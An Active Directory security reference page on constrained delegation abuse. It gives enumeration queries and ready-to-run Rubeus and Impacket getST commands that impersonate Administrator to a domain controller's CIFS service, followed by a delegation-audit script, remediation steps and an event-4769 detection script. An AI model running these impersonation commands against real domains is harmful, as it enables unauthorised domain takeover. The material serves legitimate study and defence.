Constrained Delegation Abuse

Description

Constrained delegation limits the services to which a delegating principal may obtain tickets on behalf of other users, but misconfigurations still enable privilege escalation. If attackers control a service account configured for constrained delegation, they can use S4U2Self (obtain a service ticket to the account itself on behalf of an arbitrary user) followed by S4U2Proxy (exchange that ticket for a service ticket to another service) to impersonate higher‑privileged users to the SPNs listed in msDS-AllowedToDelegateTo (e.g., CIFS, LDAP, MSSQL) and access sensitive resources. If “Use any authentication protocol” (protocol transition, the TrustedToAuthForDelegation flag) is enabled, attackers don’t even need the user’s password to impersonate them.

Examples

Enumerate Delegation Configuration

List principals that can delegate and their targets:

# PowerView
Get-DomainUser -TrustedToAuth | Select SamAccountName, msDS-AllowedToDelegateTo, UserAccountControl
Get-DomainComputer -TrustedToAuth | Select DnsHostName, msDS-AllowedToDelegateTo

# Native AD module (example for a specific account)
Get-ADUser svc_web -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation
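The PowerView and AD-module queries above return raw attribute values. The Python script below is an added example written for this page (not part of PowerView, the AD module, or the original page) that triages such values the way a reviewer would: it decodes the documented userAccountControl bits for unconstrained delegation and protocol transition, checks each msDS-AllowedToDelegateTo SPN against a Tier 0 host list, and ranks accounts by severity. The account records and the Tier 0 host set are constructed sample data standing in for real query output. It goes slightly beyond the page by also flagging unconstrained delegation and stale protocol-transition settings.

```python
# Added example (not from the original page): triage delegation settings
# already pulled from AD (e.g. by the PowerView / Get-ADUser queries above).
# Flag constants are the documented userAccountControl bits.
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # "Use any authentication protocol" (protocol transition)

# Assumption: hosts whose services are Tier 0 in this constructed environment.
TIER0_HOSTS = {"dc01.corp.local", "dc02.corp.local"}

# Constructed sample records in the shape the directory queries return.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "svc_web", "userAccountControl": 0x10200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/dc01.corp.local", "ldap/dc01.corp.local"]},
    {"sAMAccountName": "svc_report", "userAccountControl": 0x10200,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "WEB02$", "userAccountControl": 0x1000 | UF_TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "alice", "userAccountControl": 0x10200,
     "msDS-AllowedToDelegateTo": []},
]


def spn_host(spn):
    """Host part of a 'class/host[:port]' SPN, lower-cased (port and realm dropped)."""
    _, _, rest = spn.partition("/")
    return rest.split(":")[0].split("@")[0].lower()


def assess(obj):
    """Return (severity, findings) for one account record."""
    uac = obj["userAccountControl"]
    targets = obj.get("msDS-AllowedToDelegateTo") or []
    findings = []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        findings.append("unconstrained delegation")
    tier0 = sorted(t for t in targets if spn_host(t) in TIER0_HOSTS)
    if tier0:
        findings.append("delegates to Tier 0: " + ", ".join(tier0))
    if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        findings.append("protocol transition enabled")
        if not targets:
            findings.append("protocol transition set but no target SPNs (stale setting)")

    if uac & UF_TRUSTED_FOR_DELEGATION or (tier0 and uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION):
        severity = "critical"   # unconstrained, or Tier 0 reachable without the user's credentials
    elif tier0 or uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        severity = "high"
    elif targets:
        severity = "medium"     # constrained delegation to non-Tier 0 services only
    else:
        severity = "none"
    return severity, findings


def audit(objects):
    """Map sAMAccountName -> (severity, findings), highest severity first."""
    order = {"critical": 0, "high": 1, "medium": 2, "none": 3}
    ranked = sorted(objects, key=lambda o: order[assess(o)[0]])
    return {o["sAMAccountName"]: assess(o) for o in ranked}


if __name__ == "__main__":
    for name, (sev, findings) in audit(SAMPLE_OBJECTS).items():
        if sev != "none":
            print(f"{sev:8} {name:12} {'; '.join(findings)}")
```

To run it against real data, replace SAMPLE_OBJECTS with the exported attribute values (a CSV or JSON dump of the queries above) and adjust TIER0_HOSTS to the environment's domain controllers and other Tier 0 hosts.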

Abuse S4U with Rubeus

If you have the service account’s key (password, or its RC4/AES hash) and protocol transition is allowed, impersonate a target user to a delegated SPN:

# Single line: cmd.exe and PowerShell do not treat a trailing backslash as line continuation
Rubeus.exe s4u /user:svc_web /rc4:0123456789abcdef0123456789abcdef /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /ptt

This performs S4U2Self and then S4U2Proxy, and (/ptt) injects the resulting ticket for Administrator to the CIFS service on the domain controller into the current logon session.

Alternate abuse path with Kekeo/Impacket

# With Impacket getST (protocol transition + S4U2Proxy)
getST.py -dc-ip 10.0.0.10 -spn cifs/dc01.corp.local -impersonate Administrator corp.local/svc_web:'SvcPassword!'
# Point Kerberos-aware tools at the ccache getST wrote (getST prints the file name; newer Impacket versions include the SPN and realm in it)
export KRB5CCNAME=Administrator.ccache

Use the ticket to access the allowed service (SMB/LDAP/MSSQL) on the target.

Remediation

  1. Minimise and harden delegation
    • Avoid delegating to Tier 0 services (e.g., DCs, LDAP on DCs).
    • Restrict msDS-AllowedToDelegateTo to the minimum necessary SPNs.
  2. Prefer safer patterns
    • Use resource‑based constrained delegation (RBCD) with machine accounts when feasible; avoid protocol transition unless required.
    • Move workloads to gMSA/MSA and remove interactive logon rights.
  3. Monitor and review
    • Alert on changes to delegation attributes and on unusual S4U traffic: a 4769 event whose Transited Services field is populated was produced by S4U2Proxy, so baseline the expected delegator/target pairs and alert on deviations.
    • Periodically validate that delegated accounts reside outside high‑privilege tiers.
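For remediation item 3 (monitoring S4U traffic via event 4769), the following Python script is an added example written for this page, not code from the original page or from any monitoring product. It parses 4769 records in Windows event XML, keeps only those whose TransmittedServices field (rendered as “Transited Services” in Event Viewer) is populated, i.e. S4U2Proxy tickets, and raises an alert when the impersonated user is privileged, the target is a Tier 0 service, or the delegator/target pair is not one the audited msDS-AllowedToDelegateTo values would predict. The events, the policy tables and the exact formatting of the TransmittedServices value are constructed assumptions for this example.

```python
# Added example (not from the original page): detect S4U2Proxy delegation in
# Security event 4769 records. A 4769 produced by S4U2Proxy carries the
# delegating service in its TransmittedServices field ("Transited Services"
# in Event Viewer); ordinary service-ticket requests show "-".
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumed policy tables for this example.
PRIVILEGED_USERS = {"administrator", "da_backup"}  # identities that should never be delegated
TIER0_SERVICES = {"dc01$", "krbtgt"}                # service accounts of Tier 0 hosts
# Expected delegator -> target service accounts, derived from the audited
# msDS-AllowedToDelegateTo values (each SPN host resolved to its account).
ALLOWED_DELEGATION = {"svc_web": {"sql01$"}}


def _event(fields):
    """Build a minimal 4769 record in Windows event XML (constructed test data)."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4769</EventID></System>'
            f"<EventData>{data}</EventData></Event>")


# Constructed sample events; the TransmittedServices formatting is an assumption.
SAMPLE_EVENTS = [
    _event({"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "WEB01$",
            "IpAddress": "::ffff:10.0.0.55", "TransmittedServices": "-"}),
    _event({"TargetUserName": "bob@CORP.LOCAL", "ServiceName": "SQL01$",
            "IpAddress": "::ffff:10.0.0.20", "TransmittedServices": "svc_web@CORP.LOCAL"}),
    _event({"TargetUserName": "Administrator@CORP.LOCAL", "ServiceName": "DC01$",
            "IpAddress": "::ffff:10.0.0.20", "TransmittedServices": "svc_web@CORP.LOCAL"}),
    _event({"TargetUserName": "Administrator@CORP.LOCAL", "ServiceName": "SQL01$",
            "IpAddress": "::ffff:10.0.0.20", "TransmittedServices": "svc_web@CORP.LOCAL"}),
]


def parse_4769(xml_text):
    """EventData of a 4769 record as a dict, or None for any other event ID."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4769":
        return None
    return {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", namespaces=NS)}


def principal(name):
    """'svc_web@CORP.LOCAL' -> 'svc_web' (realm dropped, lower-cased)."""
    return name.split("@")[0].lower()


def analyze(xml_records):
    """Return one alert per S4U2Proxy ticket that violates the policy tables."""
    alerts = []
    for rec in xml_records:
        ev = parse_4769(rec)
        if ev is None or ev.get("TransmittedServices", "-") in ("", "-"):
            continue  # no delegation chain on this ticket
        delegator = principal(ev["TransmittedServices"])
        user = principal(ev["TargetUserName"])
        target = ev["ServiceName"].lower()
        reasons = []
        if user in PRIVILEGED_USERS:
            reasons.append("privileged user impersonated")
        if target in TIER0_SERVICES:
            reasons.append("ticket to Tier 0 service")
        if target not in ALLOWED_DELEGATION.get(delegator, set()):
            reasons.append("delegation pair not in expected configuration")
        if reasons:
            alerts.append({"delegator": delegator, "user": user, "target": target,
                           "client": ev.get("IpAddress", ""), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"{a['delegator']} -> {a['target']} as {a['user']} from {a['client']}: "
              + ", ".join(a["reasons"]))
```

In the sample data the expected svc_web to SQL01$ delegation for an ordinary user produces no alert, while the Administrator tickets do; feeding the script exported 4769 XML from the domain controllers and the allow-list produced by the configuration audit gives the same signal on real data.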